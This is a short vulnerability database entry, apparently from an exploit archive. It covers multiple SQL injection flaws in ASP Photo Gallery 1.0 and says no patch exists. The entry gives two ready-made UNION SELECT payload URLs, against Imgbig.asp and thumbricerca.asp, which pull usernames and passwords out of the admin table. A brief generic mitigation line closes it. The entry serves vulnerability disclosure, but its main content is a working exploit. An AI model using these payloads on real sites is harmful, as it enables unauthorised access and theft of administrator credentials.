vendor:
ASP Photo Gallery
by:
Ruben Ventura Piña (Trew)
6.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: ASP Photo Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:matteobinda:asp_photo_gallery:1.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
ASP Photo Gallery 1.0 – Multiple SQL Injection Vulnerabilities
Input passed to the 'Id' and 'id' parameters is not santised. This can be exploited in the following manner to obtain the admin's password: http://[site]/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1 and /thumbricerca.asp?id=-1'union select user aS name,1,pass as descrizione from stuff where '1'='1
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.